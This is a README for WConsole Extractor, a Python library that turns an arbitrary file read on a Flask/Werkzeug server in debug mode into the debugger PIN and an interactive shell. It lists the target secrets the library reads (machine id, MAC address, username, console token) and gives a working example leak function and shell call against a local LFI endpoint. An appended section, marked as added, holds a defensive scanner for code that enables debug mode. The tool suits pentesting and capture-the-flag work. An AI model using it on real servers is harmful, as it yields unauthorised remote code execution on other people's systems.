WConsole Extractor is a Python library that automatically exploits a Werkzeug development server running in debug mode. You just have to write a Python function that leaks a file's content and you have your shell :)

Welcome to WConsole Extractor 👋

License: MIT. Twitter: Ruulian_

WConsole Extractor is a library that automatically exploits a Flask server running in debug mode. You just need to write a file leak function and pass it to the WConsoleExtractor class constructor, and you can then access all the elements related to the debug mode. Moreover, you can call the shell function to obtain an interactive shell.

🔨 Install

From PyPi

Global installation:

pip3 install wconsole-extractor

Python virtual environment:

python3 -m venv env
source env/bin/activate
pip3 install wconsole-extractor

# Deactivate environment
deactivate

Installation from repository

Global installation:

git clone https://github.com/Ruulian/wconsole_extractor.git
cd wconsole_extractor
pip3 install .

Python virtual environment:

git clone https://github.com/Ruulian/wconsole_extractor.git
cd wconsole_extractor
python3 -m venv env
source env/bin/activate
pip3 install .

# Deactivate environment
deactivate

📚 Documentation

Note: The target operating system must be a Linux distribution.

Prerequisites

To use the library correctly, you need an arbitrary file read on the target, implemented in Python.

You must write a function that takes a filename as a parameter and returns the content of that file on the target. If the file is not found, the function should return an empty string.

Available attributes

From a WConsoleExtractor instance, you can access multiple attributes:

# Target information
extractor.target               # Specified target
extractor.base_url             # Target base url
extractor.hostname             # hostname

# Versions
extractor.python_version       # Python version
extractor.werkzeug_version     # Werkzeug version

# Probably public bits
extractor.username             # User who launched the application
extractor.flask_path           # Flask installation path
extractor.modname              # Constant "flask.app"
extractor.class_name           # Constant "Flask"
extractor.probably_public_bits # Probably public bits [username, modname, class_name, flask_path]

# Private bits
extractor.machine_id           # Machine id
extractor.uuidnode             # MAC address in decimal
extractor.private_bits         # private bits

# Post process information
extractor.pin_code             # Werkzeug PIN CODE
extractor.token                # Werkzeug console token (available in HTML source code)

# Functions
extractor.shell()              # Get interactive shell

Example

from wconsole_extractor import WConsoleExtractor, info
import requests

def leak_function(filename) -> str:
    r = requests.get(f"http://localhost:5000/lfi?path={filename}")
    if r.status_code == 200:
        return r.text
    else:
        return ""

extractor = WConsoleExtractor(
    target="http://localhost:5000",
    leak_function=leak_function
)


info(f"PIN CODE: {extractor.pin_code}")
extractor.shell()
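Every input to the PIN listed under "Available attributes" is read from files on the target, so the check that matters on the defending side is whether the deployed code can switch the debugger on at all. The following is an added example, not part of WConsole Extractor: a static scan of Python source for the Flask/Werkzeug settings that enable the debug console. The function name find_debug_enablers and the sample source are constructed for illustration.

```python
import ast

# Call keyword arguments that switch on the Werkzeug debugger/console.
RISKY_KWARGS = {
    "run": {"debug"},                   # Flask: app.run(debug=True)
    "run_simple": {"use_debugger"},     # werkzeug.serving.run_simple(...)
    "DebuggedApplication": {"evalex"},  # werkzeug.debug.DebuggedApplication(...)
}

# Constructed sample input, not taken from any real project.
SAMPLE = '''\
from flask import Flask
from werkzeug.serving import run_simple
app = Flask(__name__)
app.debug = True
if __name__ == "__main__":
    app.run(host="0.0.0.0", debug=True)
    run_simple("0.0.0.0", 5000, app, use_debugger=False)
'''

def _call_name(func):
    """Return the trailing name of a call target (app.run -> 'run')."""
    if isinstance(func, ast.Attribute):
        return func.attr
    return func.id if isinstance(func, ast.Name) else None

def _is_enabled(node):
    """Literal False/0/None is off; any other expression needs review."""
    return bool(node.value) if isinstance(node, ast.Constant) else True

def find_debug_enablers(source, filename="<constructed>"):
    """Return sorted (line, description) pairs for debugger-enabling code."""
    findings = []
    for node in ast.walk(ast.parse(source, filename)):
        if isinstance(node, ast.Call):
            name = _call_name(node.func)
            for kw in node.keywords:
                if kw.arg in RISKY_KWARGS.get(name, ()) and _is_enabled(kw.value):
                    findings.append((node.lineno, f"{name}({kw.arg}=...)"))
        elif isinstance(node, ast.Assign) and _is_enabled(node.value):
            for tgt in node.targets:
                if isinstance(tgt, ast.Attribute) and tgt.attr == "debug":
                    findings.append((node.lineno, "debug attribute set"))
    return sorted(findings)

if __name__ == "__main__":
    for line, what in find_debug_enablers(SAMPLE):
        print(f"line {line}: {what}")
```

The scan only sees settings written in source; debug mode enabled through the FLASK_DEBUG environment variable has to be checked in the deployment configuration.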

Author

👤 Ruulian

🤝 Contributing

Contributions, issues and feature requests are welcome!
Feel free to check the issues page.

Show your support

Give a ⭐️ if this project helped you!

📝 License

This project is MIT licensed.
